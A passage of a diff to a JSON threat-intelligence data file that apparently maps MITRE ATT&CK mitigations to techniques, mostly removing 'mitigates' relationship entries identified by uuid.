"tags": [
@@ -11750,13 +9145,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "79a4052e-1a89-4b09-aea6-51f1d11fe19c",
"tags": [
@@ -11771,13 +9159,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
"tags": [
@@ -11855,27 +9236,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ca205a36-c1ad-488b-aa6c-ab34bdd3a36b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c",
"tags": [
@@ -11911,13 +9271,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436",
"tags": [
@@ -11985,20 +9338,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9c306d8d-cde7-4b4c-b6e8-d0bb16caca36",
"tags": [
@@ -12340,13 +9679,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2204c371-6100-4ae0-82f3-25c07c29772a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "22379609-a99f-4a01-bd7e-70f3e105859d",
"tags": [
@@ -12490,15 +9822,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "95ddb356-7ba0-4bd9-a889-247262b8946f",
"value": "Rootkit Mitigation - T1014"
},
@@ -12560,20 +9884,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "317fefa6-46c7-4062-adb6-2008cf6bcb41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8",
"tags": [
@@ -12623,13 +9933,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "791481f8-e96a-41be-b089-a088763083d4",
"tags": [
@@ -12637,13 +9940,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
"tags": [
@@ -12693,13 +9989,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b2001907-166b-4d71-bb3c-9d26c871de09",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
"tags": [
@@ -12721,20 +10010,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "cc89ecbd-3d33-4a41-bcca-001e702d18fd",
"tags": [
@@ -12844,15 +10119,7 @@
"https://attack.mitre.org/mitigations/T1170"
]
},
- "related": [
- {
- "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d2dce10b-3562-4d61-b2f5-7c6384b038e2",
"value": "Mshta Mitigation - T1170"
},
@@ -12914,13 +10181,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e",
"tags": [
@@ -12977,20 +10237,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a3be63a-64c5-4678-a036-03ff8fc35300",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530",
"tags": [
@@ -13033,13 +10279,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "91ce1ede-107f-4d8b-bf4c-735e8789c94b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "92a78814-b191-47ca-909c-1ccfe3777414",
"tags": [
@@ -13054,6 +10293,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "9664ad0e-789e-40ac-82e2-d7b17fbe8fb3",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "a2029942-0a85-4947-b23c-ca434698171d",
"tags": [
@@ -13082,13 +10328,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"tags": [
@@ -13124,13 +10363,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534",
"tags": [
@@ -13200,15 +10432,7 @@
"https://technet.microsoft.com/library/cc938799.aspx"
]
},
- "related": [
- {
- "dest-uuid": "2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "9da16278-c6c5-4410-8a6b-9c16ce8005b3",
"value": "Screensaver Mitigation - T1180"
},
@@ -13221,15 +10445,7 @@
"https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET"
]
},
- "related": [
- {
- "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8c918d8a-11c5-4ffd-af10-e74bc06bdfae",
"value": "Rundll32 Mitigation - T1085"
},
@@ -13241,15 +10457,7 @@
"https://attack.mitre.org/mitigations/T1062"
]
},
- "related": [
- {
- "dest-uuid": "4be89c7c-ace6-4876-9377-c8d54cef3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2c3ce852-06a2-40ee-8fe6-086f6402a739",
"value": "Hypervisor Mitigation - T1062"
},
@@ -13261,15 +10469,7 @@
"https://attack.mitre.org/mitigations/T1207"
]
},
- "related": [
- {
- "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b70627f7-3b43-4c6f-8fc0-c918c41f8f72",
"value": "DCShadow Mitigation - T1207"
},
@@ -13324,13 +10524,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3120b9fa-23b8-4500-ae73-09494f607b7d",
"tags": [
@@ -13380,13 +10573,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "4579d9c9-d5b9-45e0-9848-0104637b579f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4d2a5b3e-340d-4600-9123-309dd63c9bf8",
"tags": [
@@ -13408,13 +10594,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
"tags": [
@@ -13478,20 +10657,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
"tags": [
@@ -13520,13 +10685,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
"tags": [
@@ -13548,27 +10706,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4",
"tags": [
@@ -13652,13 +10789,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
- },
- {
- "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
}
],
"uuid": "90c218c3-fbf8-4830-98a7-e8cfb7eaa485",
@@ -13673,15 +10803,7 @@
"https://attack.mitre.org/mitigations/T1208"
]
},
- "related": [
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a3e12b04-8598-4909-8855-2c97c1e7d549",
"value": "Kerberoasting Mitigation - T1208"
},
@@ -13715,13 +10837,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b",
"tags": [
@@ -13743,13 +10858,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"tags": [
@@ -13788,15 +10896,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "45e7f570-6a0b-4095-bf02-4bca05da6bae",
"value": "Masquerading Mitigation - T1036"
},
@@ -13816,20 +10916,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
"tags": [
@@ -13858,13 +10944,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "101c3a64-9ba5-46c9-b573-5c501053cbca",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "10ff21b9-5a01-4268-a1b5-3b55015f1847",
"tags": [
@@ -13887,14 +10966,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "215190a9-9f02-4e83-bb5f-e0589965a302",
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -13914,13 +10986,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2cd950a6-16c4-404a-aa01-044322395107",
"tags": [
@@ -13935,13 +11000,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "317fefa6-46c7-4062-adb6-2008cf6bcb41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e",
"tags": [
@@ -13998,13 +11056,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665",
"tags": [
@@ -14012,13 +11063,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "4bf5845d-a814-4490-bc5c-ccdee6043025",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"tags": [
@@ -14034,14 +11078,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79",
+ "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc",
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -14075,13 +11119,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071",
"tags": [
@@ -14089,13 +11126,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6fb6408c-0db3-41d9-a3a1-a32e5f16454e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"tags": [
@@ -14103,13 +11133,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
@@ -14131,13 +11154,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961",
"tags": [
@@ -14173,13 +11189,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
"tags": [
@@ -14187,20 +11196,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6",
"tags": [
@@ -14271,6 +11266,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "bef8aaee-961d-4359-a308-4c2182bcedff",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "bf96a5a3-3bce-43b7-8597-88545984c07b",
"tags": [
@@ -14285,13 +11287,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c92e3d68-2349-49e4-a341-7edca2deff96",
"tags": [
@@ -14334,13 +11329,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -14362,13 +11350,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f792d02f-813d-402b-86a5-ab98cb391d3b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
"tags": [
@@ -14487,20 +11468,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "723e3a2b-ca0d-4daa-ada8-82ea35d3733a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
"tags": [
@@ -14557,13 +11524,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839",
"tags": [
@@ -14578,13 +11538,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d519cfd5-f3a8-43a9-a846-ed0bb40672b1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a",
"tags": [
@@ -14592,13 +11545,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ee7ff928-801c-4f34-8a99-3df965e581a5",
"tags": [
@@ -14619,13 +11565,6 @@
]
},
"related": [
- {
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3",
"tags": [
@@ -14661,13 +11600,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1",
"tags": [
@@ -14696,27 +11628,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "5ad95aaa-49c1-4784-821d-2e83f47b079b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "723e3a2b-ca0d-4daa-ada8-82ea35d3733a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
@@ -14738,13 +11649,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "a0a189c8-d3bd-4991-bf6f-153d185ee373",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ae7f3575-0a5e-427e-991b-fe03ad44c754",
"tags": [
@@ -14787,13 +11691,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a",
"tags": [
@@ -14821,13 +11718,6 @@
]
},
"related": [
- {
- "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada",
"tags": [
@@ -14863,13 +11753,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
"tags": [
@@ -14926,15 +11809,7 @@
"https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/"
]
},
- "related": [
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "57019a80-8523-46b6-be7d-f763a15a2cc6",
"value": "Scripting Mitigation - T1064"
},
@@ -14948,22 +11823,7 @@
"https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process"
]
},
- "related": [
- {
- "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "1b7b1806-7746-41a1-a35d-e48dae25ddba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "96150c35-466f-4f0a-97a9-ae87ee27f751",
"value": "Bootkit Mitigation - T1067"
},
@@ -14976,15 +11836,7 @@
"https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/"
]
},
- "related": [
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d0415180-51e9-40ce-b57c-c332b0b441f2",
"value": "PowerShell Mitigation - T1086"
},
@@ -15001,22 +11853,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5c167af7-c2cb-42c8-ae67-3fb275bf8488",
"value": "Timestomp Mitigation - T1099"
},
@@ -15029,15 +11866,7 @@
"https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET"
]
},
- "related": [
- {
- "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "12c13879-b7bd-4bc5-8def-aacec386d432",
"value": "Regsvr32 Mitigation - T1117"
},
@@ -15049,15 +11878,7 @@
"https://attack.mitre.org/mitigations/T1118"
]
},
- "related": [
- {
- "dest-uuid": "f792d02f-813d-402b-86a5-ab98cb391d3b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ec418d1b-4963-439f-b055-f914737ef362",
"value": "InstallUtil Mitigation - T1118"
},
@@ -15070,15 +11891,7 @@
"https://msitpros.com/?p=3960"
]
},
- "related": [
- {
- "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "91816292-3686-4a6e-83c4-4c08513b9b57",
"value": "CMSTP Mitigation - T1191"
},
@@ -15090,15 +11903,7 @@
"https://attack.mitre.org/mitigations/T1142"
]
},
- "related": [
- {
- "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "56648de3-8947-4559-90c4-eda10acc0f5a",
"value": "Keychain Mitigation - T1142"
},
@@ -15110,15 +11915,7 @@
"https://attack.mitre.org/mitigations/T1152"
]
},
- "related": [
- {
- "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e333cf16-5bfa-453e-8e6a-3a4c63d6bfcc",
"value": "Launchctl Mitigation - T1152"
},
@@ -15130,15 +11927,7 @@
"https://attack.mitre.org/mitigations/T1153"
]
},
- "related": [
- {
- "dest-uuid": "45d84c8b-c1e2-474d-a14d-69b5de0a2bc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5391ece4-8866-415d-9b5e-8dc5944f612a",
"value": "Source Mitigation - T1153"
},
@@ -15150,15 +11939,7 @@
"https://attack.mitre.org/mitigations/T1154"
]
},
- "related": [
- {
- "dest-uuid": "b53dbcc6-147d-48bb-9df4-bcb8bb808ff6",
